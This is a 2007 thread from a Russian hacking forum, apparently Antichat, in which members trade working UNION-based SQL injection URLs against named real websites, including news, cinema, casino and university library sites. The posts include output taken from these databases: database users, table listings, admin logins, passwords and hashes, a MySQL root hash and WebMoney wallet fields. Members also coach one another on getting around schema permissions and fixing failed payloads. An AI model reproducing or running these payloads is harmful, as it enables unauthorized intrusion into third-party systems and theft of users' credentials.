06.11.2007, 01:53
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
http://cinema.variety.ru/actors.php?cid=1&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13/*
4.0.27-standard-log/variety_dvd/variety_dvd@localhost
-------------------------------------------------------------------
http://www.semenovsky.ru/?pageId=124&newsId=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1/*
5.0.44-log/semenovskiy/semenovskiy@localhost
http://www.semenovsky.ru/?pageId=124&newsId=-1+union+select+1,2,concat_ws(0x2F,table_name,colum n_name),4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1+fro m+information_schema.columns/*
доступ к information_schema
------------------------------------------------------------------
http://www.vremea.net/index.php?content=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*
4.0.27-standard/vremea_vremea/vremea@localhost
------------------------------------------------------------------
na-dosuge.dp.ua
http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*
5.0.27/price/dprice@localhost
http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,name,pass,email)+fro m+_rat+limit+0,1/*
имя/пароль/мейл
prod/2503919/beliu_impex@mail.ru
http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,customers_firstname, customers_password)+from+customers+limit+3,1/*
имя\хеш с солью
А это их казино
http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,login,pass,wm)+from+ casino_uwed+limit+0,1/*
логин/пароль/WebMoney наверно кошелек
http://www.na-dosuge.dp.ua/face/index.php3?t=-1+union+select+concat_ws(0x2F,login,pass,wm)+from+casino_wm+limit+1,1/*
Эти таблицы пустые ))) (за исключением тестовых юзверей). Сайт сырой и казино будет попозже )
|
|
|
06.11.2007, 09:53
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
vsekiden.com - похоже на БТА - Болгарское Телевизионное Агенство
Код:
http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*
5.0.32-Debian_7etch1-log:vsekiden:vsekiden@localhost
81 таблица:
Код:
http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+80,1/*
root:
Код:
http://www.vsekiden.com/news.php?topic=3&id=-1+union+select+1,concat_ws(0x3a,User,Password),3,4,5,6,7,8,9,10+from+mysql.user/*
root:*CCBD21CD8E1C871D9C7F996760C867CC31F4830F
Интересные табы:
newvd_users,
cgp133_users,
cgp133_ecards
|
|
|
|
06.11.2007, 14:37
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
www.weltexpress.info
Код:
http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
5.0.24-DEBIAN_3-LOG:WELTEXPRESS:WELTEXPRESS@LOCALHOST
35 таблиц:
Код:
http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+table_name+from+information_schema.tables+limit+34,1/*
Нашёл таблицу USER, посмотрел её схему: PHILBERL-1.USER и WELTEXPRESS.USER
Есть поля USER и PWD, но данные вывести не получилось... Требуется подсказка.
Ещё есть таблицы C_USERS и KALASCHNIKOW. В последней из них есть любопытные поля:
UNIXDATA, PASSWORD, BN_NAME...
Но с выводом данных - проблема. 
|
|
|
|
06.11.2007, 14:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Проблема от того, что бажная пага коннектится от юзера Weltexpress, а найденные тобой табы принадлежат другим юзерам... Вот и не получается организовать вывод, т.к. в схеме твоего пользователя этих таб нету.
|
|
|
|
06.11.2007, 16:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
fRg, вот смотри - при инъекции иногда полезно бывает просматривать поле table_schema, чтобы видеть в какой схеме находится интересующая нас таблица, иначе, как в твоём случае, есть шанс, что текущему пользователю не хватит прав на доступ к ней. Вот пример:
http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+concat_ws(0x3a,user(),table_schema, table_name)+from+information_schema.tables+limit+3 4,1/*
Он выводит:
WELTEXPRESS@LOCALHOST:PHILBERL-1:WISSENSCHAFT_KALASCHNIKOW
Легко убедиться, что наш юзер это WELTEXPRESS, а таблица WISSENSCHAFT_KALASCHNIKOW находится в схеме пользователя PHILBERL-1.
|
|
|
|
06.11.2007, 17:02
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
С нами:
9803665
Репутация:
22
|
|
http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,4,5,6+news_admin/*
не смог найти имена колонок)
Последний раз редактировалось nikoTM; 06.11.2007 в 17:08..
|
|
|
|
06.11.2007, 20:57
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами:
10240623
Репутация:
79
|
|
Сообщение от nikoTM
не смог найти имена колонок)
Там только таблица forum есть с полями (data, id,ip,mail) больше не нашёл
|
|
|
|
06.11.2007, 21:09
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от KEHT33
Там только таблица forum есть с полями (data, id,ip,mail) больше не нашёл
Плохо искал:
Код:
http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,concat(login,0x3a,password),5,6%20from%20gm_users/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
06.11.2007, 18:34
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами:
10240166
Репутация:
2097
|
|
http://goldenmask.ru/news.php?nid=-1+union+select+1,2,3,4,5,6+news_admin/*
там таблицы такой нет, ты from забыл
lib.uci.edu
http://www.lib.uci.edu/partners/index.php?page=eresearch
в поле Premium access:
Код:
Partner ID') OR 1=(SELECT TOP 1 PASSWORD FROM USERS)--
SYSTEM_USER: PartnersPublic
DB_NAME: partners
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
User: PartnersPublic
hash:fd6df34ee4e7642c02ced6012028f6b8
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 06.11.2007 в 18:47..
|
|
|
|
07.11.2007, 15:27
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
С нами:
9803665
Репутация:
22
|
|
Сообщение от l-l00K
там таблицы такой нет, ты from забыл
Блин как стыдно  не думал что могу сделать такую ошибку )
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
